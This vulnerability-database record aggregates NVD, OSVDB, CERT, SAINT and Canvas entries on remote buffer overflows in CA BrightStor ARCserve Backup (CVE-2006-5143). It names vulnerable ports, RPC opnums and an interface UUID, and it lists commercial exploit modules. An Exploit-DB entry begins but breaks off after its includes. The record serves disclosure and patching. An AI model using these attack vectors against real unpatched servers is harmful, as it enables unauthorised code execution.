CA Multiple Product ASCORE.dll Long String Remote Overflow
2006-10-05T08:04:39
ID: OSVDB:29535 | Type: osvdb | Reporter: OSVDB | Modified: 2006-10-05T08:04:39
Description
No description provided by the source
References:
Vendor Specific Advisory URL
Secunia Advisory ID: 22285
Related OSVDB ID: 29534
Related OSVDB ID: 29533
Other Advisory URL: http://livesploit.com/advisories/LS-20060313.pdf
Other Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-031.html
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0098.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0075.html
Keyword: LS-20060313
Keyword: TCP Port 6503
CVE-2006-5143
{"cve": [{"lastseen": "2020-12-09T19:23:48", "description": "Multiple buffer overflows in CA BrightStor ARCserve Backup r11.5 SP1 and earlier, r11.1, and 9.01; BrightStor ARCserve Backup for Windows r11; BrightStor Enterprise Backup 10.5; Server Protection Suite r2; and Business Protection Suite r2 allow remote attackers to execute arbitrary code via crafted data on TCP port 6071 to the Backup Agent RPC Server (DBASVR.exe) using the RPC routines with opcode (1) 0x01, (2) 0x02, or (3) 0x18; invalid stub data on TCP port 6503 to the RPC routines with opcode (4) 0x2b or (5) 0x2d in ASCORE.dll in the Message Engine RPC Server (msgeng.exe); (6) a long hostname on TCP port 41523 to ASBRDCST.DLL in the Discovery Service (casdscsvc.exe); or unspecified vectors related to the (7) Job Engine Service.", "edition": 5, "cvss3": {}, "published": "2006-10-10T04:06:00", "title": "CVE-2006-5143", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-5143"], "modified": "2018-10-17T21:41:00", "cpe": ["cpe:/a:ca:brightstor_arcserve_backup:11.1", "cpe:/a:ca:brightstor_arcserve_backup:11.5", "cpe:/a:ca:brightstor_arcserve_backup:9.01", "cpe:/a:ca:server_protection_suite:2", "cpe:/a:ca:business_protection_suite:2.0", "cpe:/a:ca:brightstor_arcserve_backup:11", "cpe:/a:ca:brightstor_enterprise_backup:10.5"], "id": "CVE-2006-5143", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5143", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": 
["cpe:2.3:a:ca:brightstor_arcserve_backup:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_enterprise_backup:10.5:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup:11:*:windows:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup:9.01:*:*:*:*:*:*:*", "cpe:2.3:a:ca:business_protection_suite:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ca:server_protection_suite:2:*:*:*:*:*:*:*", "cpe:2.3:a:ca:brightstor_arcserve_backup:11.5:sp1:*:*:*:*:*:*"]}], "canvas": [{"lastseen": "2019-05-29T17:19:20", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "description": "**Name**| brightstor_message \n---|--- \n**CVE**| CVE-2006-5143 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CA BrightStor ARCserve Backup RPC Interface Overflow \n**Notes**| CVE Name: CVE-2006-5143 \nVENDOR: Computer Associates \nNotes: \nPlatforms Tested: \nReferences: http://dvlabs.tippingpoint.com/advisory/TPTI-06-11 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143 \nDate public: 10/05/06 \nCVSS: 7.5 \n\n", "edition": 2, "modified": "2006-10-10T04:06:00", "published": "2006-10-10T04:06:00", "id": "BRIGHTSTOR_MESSAGE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/brightstor_message", "type": "canvas", "title": "Immunity Canvas: BRIGHTSTOR_MESSAGE", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2016-10-03T15:01:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "description": "Added: 11/09/2006 \nCVE: [CVE-2006-5143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143>) \nBID: [20365](<http://www.securityfocus.com/bid/20365>) \nOSVDB: [29535](<http://www.osvdb.org/29535>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) family of products includes a Message Engine which listens for connections on port 6503/TCP. 
\n\n### Problem\n\nA buffer overflow in the `**ASCORE.dll**` library allows remote attackers to execute arbitrary commands when a specially crafted request is processed by the Message Engine RPC server. \n\n### Resolution\n\nApply the upgrade referenced in the Computer Associates [Security Notice](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0098.html> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.5. Due to the nature of the vulnerability, the success of this exploit may depend on the system state at the time the exploit is run. \n\n### Platforms\n\nWindows 2000 SP4 \nWindows 2000 SP4 / Windows 2000 \nWindows 2000 SP3 \n \n\n", "edition": 1, "modified": "2006-11-09T00:00:00", "published": "2006-11-09T00:00:00", "id": "SAINT:F3E2F7DBC978E1EFC1903BAAFECC97D2", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_ascore", "type": "saint", "title": "BrightStor ARCserve Message Engine RPC server buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "description": "Added: 10/19/2006 \nCVE: [CVE-2006-5143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143>) \nBID: [20365](<http://www.securityfocus.com/bid/20365>) \nOSVDB: [29534](<http://www.osvdb.org/29534>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) server includes a discovery service which listens on ports 41523/TCP and 41524/UDP. \n\n### Problem\n\nA buffer overflow vulnerability in the `**ASBRDCST.DLL**` library allows remote attackers to execute arbitrary commands by sending a specially crafted TCP packet to the discovery service. 
\n\n### Resolution\n\nApply the update referenced in Computer Associates' [Security Notice](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-06-030.html> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.1 SP2. \n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "edition": 1, "modified": "2006-10-19T00:00:00", "published": "2006-10-19T00:00:00", "id": "SAINT:A6F8D23E499B7A2D3D64F8284674F95C", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_asbrdcst", "type": "saint", "title": "BrightStor ARCserve discovery service ASBRDCST.DLL buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:31", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "description": "Added: 11/09/2006 \nCVE: [CVE-2006-5143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143>) \nBID: [20365](<http://www.securityfocus.com/bid/20365>) \nOSVDB: [29535](<http://www.osvdb.org/29535>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) family of products includes a Message Engine which listens for connections on port 6503/TCP. \n\n### Problem\n\nA buffer overflow in the `**ASCORE.dll**` library allows remote attackers to execute arbitrary commands when a specially crafted request is processed by the Message Engine RPC server. \n\n### Resolution\n\nApply the upgrade referenced in the Computer Associates [Security Notice](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0098.html> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.5. 
Due to the nature of the vulnerability, the success of this exploit may depend on the system state at the time the exploit is run. \n\n### Platforms\n\nWindows 2000 SP4 \nWindows 2000 SP4 / Windows 2000 \nWindows 2000 SP3 \n \n\n", "edition": 4, "modified": "2006-11-09T00:00:00", "published": "2006-11-09T00:00:00", "id": "SAINT:C973FD52CD02FDCC0CAFC5DDFB65EA6B", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_ascore", "title": "BrightStor ARCserve Message Engine RPC server buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T17:19:55", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "edition": 2, "description": "Added: 11/09/2006 \nCVE: [CVE-2006-5143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143>) \nBID: [20365](<http://www.securityfocus.com/bid/20365>) \nOSVDB: [29535](<http://www.osvdb.org/29535>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) family of products includes a Message Engine which listens for connections on port 6503/TCP. \n\n### Problem\n\nA buffer overflow in the `**ASCORE.dll**` library allows remote attackers to execute arbitrary commands when a specially crafted request is processed by the Message Engine RPC server. \n\n### Resolution\n\nApply the upgrade referenced in the Computer Associates [Security Notice](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). \n\n### References\n\n<http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0098.html> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.5. Due to the nature of the vulnerability, the success of this exploit may depend on the system state at the time the exploit is run. 
\n\n### Platforms\n\nWindows 2000 SP4 \nWindows 2000 SP4 / Windows 2000 \nWindows 2000 SP3 \n \n\n", "modified": "2006-11-09T00:00:00", "published": "2006-11-09T00:00:00", "id": "SAINT:672F5439C31CDBDD093CEF54772E43DC", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_ascore", "type": "saint", "title": "BrightStor ARCserve Message Engine RPC server buffer overflow", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T17:19:52", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "edition": 2, "description": "Added: 10/19/2006 \nCVE: [CVE-2006-5143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143>) \nBID: [20365](<http://www.securityfocus.com/bid/20365>) \nOSVDB: [29534](<http://www.osvdb.org/29534>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) server includes a discovery service which listens on ports 41523/TCP and 41524/UDP. \n\n### Problem\n\nA buffer overflow vulnerability in the `**ASBRDCST.DLL**` library allows remote attackers to execute arbitrary commands by sending a specially crafted TCP packet to the discovery service. \n\n### Resolution\n\nApply the update referenced in Computer Associates' [Security Notice](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-06-030.html> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.1 SP2. 
\n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "modified": "2006-10-19T00:00:00", "published": "2006-10-19T00:00:00", "id": "SAINT:C66D96A3EE5E3D7ECAD91CB1BAC5CC54", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_asbrdcst", "type": "saint", "title": "BrightStor ARCserve discovery service ASBRDCST.DLL buffer overflow", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-04T23:19:34", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "description": "Added: 10/19/2006 \nCVE: [CVE-2006-5143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143>) \nBID: [20365](<http://www.securityfocus.com/bid/20365>) \nOSVDB: [29534](<http://www.osvdb.org/29534>) \n\n\n### Background\n\nThe [BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) server includes a discovery service which listens on ports 41523/TCP and 41524/UDP. \n\n### Problem\n\nA buffer overflow vulnerability in the `**ASBRDCST.DLL**` library allows remote attackers to execute arbitrary commands by sending a specially crafted TCP packet to the discovery service. \n\n### Resolution\n\nApply the update referenced in Computer Associates' [Security Notice](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-06-030.html> \n\n\n### Limitations\n\nExploit works on BrightStor ARCserve Backup 11.1 SP2. 
\n\n### Platforms\n\nWindows 2000 \nWindows Server 2003 \n \n\n", "edition": 4, "modified": "2006-10-19T00:00:00", "published": "2006-10-19T00:00:00", "id": "SAINT:D523B91C773D575ADDBF31529A6773B4", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/brightstor_arcserve_asbrdcst", "title": "BrightStor ARCserve discovery service ASBRDCST.DLL buffer overflow", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "cvelist": ["CVE-2006-5143"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp)\n[Secunia Advisory ID:22285](https://secuniaresearch.flexerasoftware.com/advisories/22285/)\n[Related OSVDB ID: 29534](https://vulners.com/osvdb/OSVDB:29534)\n[Related OSVDB ID: 29535](https://vulners.com/osvdb/OSVDB:29535)\nOther Advisory URL: http://livesploit.com/advisories/LS-20060330.pdf\nOther Advisory URL: http://www.tippingpoint.com/security/advisories/TSRT-06-11.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0101.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0075.html\nKeyword: LS-20060330\nKeyword: TCP Port 6071\n[CVE-2006-5143](https://vulners.com/cve/CVE-2006-5143)\n", "modified": "2006-10-05T08:04:39", "published": "2006-10-05T08:04:39", "href": "https://vulners.com/osvdb/OSVDB:29533", "id": "OSVDB:29533", "title": "CA Multiple Product DBASVR.exe Multiple RPC Routine Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "cvelist": ["CVE-2006-5143"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory 
URL](http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp)\n[Secunia Advisory ID:22285](https://secuniaresearch.flexerasoftware.com/advisories/22285/)\n[Related OSVDB ID: 29533](https://vulners.com/osvdb/OSVDB:29533)\n[Related OSVDB ID: 29535](https://vulners.com/osvdb/OSVDB:29535)\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-030.html\nOther Advisory URL: http://livesploit.com/advisories/LS-20060220.pdf\nOther Advisory URL: http://www.lssec.com/advisories/LS-20060220.pdf\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0097.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0075.html\nKeyword: UDP Port 41524\nKeyword: ZDI-06-030\nKeyword: TCP Port 41523\nKeyword: LS-20060220\n[CVE-2006-5143](https://vulners.com/cve/CVE-2006-5143)\n", "modified": "2006-10-05T08:04:39", "published": "2006-10-05T08:04:39", "href": "https://vulners.com/osvdb/OSVDB:29534", "id": "OSVDB:29534", "title": "CA Multiple Product ASBRDCST.DLL (casdscsvc.exe) Hostname Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:27", "bulletinFamily": "software", "cvelist": ["CVE-2007-0169", "CVE-2006-5143"], "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://supportconnectw.ca.com/public/storage/infodocs/babimpsec-notice.asp)\n[Secunia Advisory ID:23648](https://secuniaresearch.flexerasoftware.com/advisories/23648/)\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-07-003.html\nOther Advisory URL: http://www.lssec.com/advisories/LS-20060330.pdf\nOther Advisory URL: http://www.lssec.com/advisories/LS-20060313.pdf\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-031.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0093.html\nMail List Post: 
http://archives.neohapsis.com/archives/bugtraq/2006-10/0088.html\nMail List Post: http://archives.neohapsis.com/archives/vuln-dev/2007-q1/0021.html\nMail List Post: http://archives.neohapsis.com/archives/vuln-dev/2007-q1/0011.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0340.html\nKeyword: Opnum 45\nKeyword: Opnum 43\nKeyword: TCP Port 6503\nKeyword: dc246bf0-7a7a-11ce-9f88-00805fe43838\n\n[CVE-2007-0169](https://vulners.com/cve/CVE-2007-0169)\n[CVE-2006-5143](https://vulners.com/cve/CVE-2006-5143)\n", "edition": 1, "modified": "2006-10-07T11:24:18", "published": "2006-10-07T11:24:18", "href": "https://vulners.com/osvdb/OSVDB:31318", "id": "OSVDB:31318", "title": "CA BrightStor ARCserve Backup ASCORE.dll (msgeng.exe) Multiple RPC Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cert": [{"lastseen": "2020-09-18T20:42:58", "bulletinFamily": "info", "cvelist": ["CVE-2006-5143"], "description": "### Overview \n\nMultiple vulnerabilities exist in Computer Associates backup products. If successfully exploited, these vulnerabilities may allow an attacker to execute arbitrary code.\n\n### Description \n\n[BrightStor ARCserve Backup](<http://www3.ca.com/solutions/ProductFamily.aspx?ID=115>) is a backup and data retention tool that integrates with other BrightStor Data Availability and BrightStor Storage Management solutions. [Computer Associates Protection Suites](<http://www3.ca.com/smb/solution.aspx?id=5312>) offer multiple Computer Associates security and data recovery products in a single package. \n\nBrightStor and CA (Computer Associates) Protection Suite products contain multiple buffer overflow vulnerabilities due to incorrect handling of RPC requests. These overflows may be exploited by sending a malformed RPC request with Opnum 43 `(``port 6503/tcp``)` or Opnum 45 `(port 6503/tcp``) `to a vulnerable system. 
\n \nNote that only the Microsoft Windows versions of Computer Associates products are affected by this vulnerability. \n \nFor more information, including a list of affected products, refer to the Computer Associates[ Security Advisory](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code with SYSTEM privileges. \n \n--- \n \n### Solution \n\n**Upgrade** \nAccording to [Computer Associates](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>): \n_Customers with vulnerable versions of the BrightStor ARCserve Backup products should upgrade to the latest versions which will be available for download from _[_http://supportconnect.ca.com_](<http://supportconnect.ca.com>)_ on or before October 5._ \n \n--- \n \n \n**Restrict Access** \n \nRestricting access to port `6503/tcp` at the network perimeter may mitigate the impact of this vulnerability. \n \n--- \n \n### Vendor Information\n\n860048\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Computer Associates __ Affected\n\nUpdated: November 02, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [_http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp_](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). 
\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23860048 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.tippingpoint.com/security/advisories/TSRT-06-11.html>\n * <http://www.zerodayinitiative.com/advisories/ZDI-06-030.html>\n * <http://www.zerodayinitiative.com/advisories/ZDI-06-031.html>\n * <http://www.lssec.com/advisories/LS-20060220.pdf>\n * <http://www.lssec.com/advisories/LS-20060313.pdf>\n * <http://www.lssec.com/advisories/LS-20060330.pdf>\n * <http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>\n * <http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34693>\n * <http://www.securityfocus.com/bid/20365>\n * <http://www.frsirt.com/english/advisories/2006/3930>\n * <http://securitytracker.com/id?1017003>\n * <http://securitytracker.com/id?1017004>\n * <http://securitytracker.com/id?1017005>\n * <http://securitytracker.com/id?1017006>\n * <http://xforce.iss.net/xforce/xfdb/29364>\n\n### Acknowledgements\n\nThis vulnerability was reported by the TippingPoint and the Zero Day Initiative. 
TippingPoint credits LSsecurity with reporting this vulnerability.\n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-5143](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-5143>) \n---|--- \n**Severity Metric:** | 0.28 \n**Date Public:** | 2006-10-05 \n**Date First Published:** | 2006-11-02 \n**Date Last Updated: ** | 2007-02-06 20:29 UTC \n**Document Revision: ** | 48 \n", "modified": "2007-02-06T20:29:00", "published": "2006-11-02T00:00:00", "id": "VU:860048", "href": "https://www.kb.cert.org/vuls/id/860048", "type": "cert", "title": "Computer Associates BrightStor ARCserv and Protection Suite products RPC buffer overflow vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-18T20:42:58", "bulletinFamily": "info", "cvelist": ["CVE-2006-5143"], "description": "### Overview \n\nMultiple Computer Associates products contain a buffer overflow in the code that handles the Discovery Service protocol. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code.\n\n### Description \n\nComputer Associates BrightStor ARCserve Backup, BrightStor Enterprise Backup, CA Server Protection Suite, and CA Business Protection Suite software use a protocol known as the Discovery Service to find other BrightStor and Protection Suite installations. A lack of validation on Discovery Service packets may allow a buffer overflow to occur. \n\nThis vulnerability only affects Computer Associates BrightStor ARCserve and Protection Suite products for the Microsoft Windows platform. \n \nFor more information, including a list of affected products, refer to the Computer Associates BrightStor ARCserve Backup [Security Notice](<http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>). \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code with `SYSTEM` privileges. 
\n \n--- \n \n### Solution \n\n**Upgrade** \nAccording to Computer Associates: \n \n_Customers with vulnerable versions of the BrightStor ARCserve Backup products should upgrade to the latest versions which will be available for download from _[__http://supportconnect.ca.com__](<http://supportconnect.ca.com/>)_ on or before October 5. _ \n \n--- \n \n**Restrict Access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by the Discovery Service protocol (typically ports 41524/udp and 41523/tcp). This will limit your exposure to attacks. However, blocking at the network perimeter would still allow attackers within the perimeter of your network to exploit the vulnerability. The use of host-based firewalls in addition to network-based firewalls can help restrict access to specific hosts within the network. It is important to understand your network's configuration and service requirements before deciding what changes are appropriate. \n \n--- \n \n### Vendor Information\n\n361792\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### Computer Associates __ Affected\n\nUpdated: November 01, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23361792 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.tippingpoint.com/security/advisories/TSRT-06-11.html>\n * <http://www.zerodayinitiative.com/advisories/ZDI-06-030.html>\n * <http://www.zerodayinitiative.com/advisories/ZDI-06-031.html>\n * <http://www.lssec.com/advisories/LS-20060220.pdf>\n * <http://www.lssec.com/advisories/LS-20060313.pdf>\n * <http://www.lssec.com/advisories/LS-20060330.pdf>\n * <http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp>\n * [http://www3.ca.com/securityadvisor/blogs/posting.aspx?pid=93775&id=90744 ](<http://www3.ca.com/securityadvisor/blogs/posting.aspx?pid=93775&id=90744 >)\n * [http://www3.ca.com/securityadvisor/blogs/posting.aspx?pid=94397&id=90744 ](<http://www3.ca.com/securityadvisor/blogs/posting.aspx?pid=94397&id=90744 >)\n * <http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34693>\n * <http://www.securityfocus.com/bid/20365>\n * <http://www.frsirt.com/english/advisories/2006/3930>\n * <http://securitytracker.com/id?1017003>\n * <http://securitytracker.com/id?1017004>\n * <http://securitytracker.com/id?1017005>\n * <http://securitytracker.com/id?1017006>\n * <http://xforce.iss.net/xforce/xfdb/29364>\n\n### Acknowledgements\n\nThis vulnerability was reported by the TippingPoint and the Zero Day Initiative. 
TippingPoint credits LSsecurity with reporting this vulnerability.\n\nThis document was written by Jeff Gennari based on information from LSsecurity.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-5143](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-5143>) \n---|--- \n**Severity Metric:** | 16.54 \n**Date Public:** | 2006-10-05 \n**Date First Published:** | 2006-11-01 \n**Date Last Updated: ** | 2007-01-12 21:37 UTC \n**Document Revision: ** | 33 \n", "modified": "2007-01-12T21:37:00", "published": "2006-11-01T00:00:00", "id": "VU:361792", "href": "https://www.kb.cert.org/vuls/id/361792", "type": "cert", "title": "Computer Associates Discovery Service buffer overflow", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T08:52:39", "description": "Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities (1). CVE-2006-5143. Remote exploit for windows platform", "published": "2006-10-05T00:00:00", "type": "exploitdb", "title": "Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5143"], "modified": "2006-10-05T00:00:00", "id": "EDB-ID:28765", "href": "https://www.exploit-db.com/exploits/28765/", "sourceData": "source: http://www.securityfocus.com/bid/20365/info\r\n\r\nMultiple Computer Associates products are prone to multiple buffer-overflow vulnerabilities because the applications using an affected library fail to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.\r\n\r\nExploiting these issues allows attackers to execute arbitrary machine code within the context of the affected application.\r\n\r\n/*\r\n * LSsec.com\r\n *\r\n * CA BrightStor ARCserve Backup v11.5 Message Engine Remote Heap Overflow Exploit\r\n *\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include 
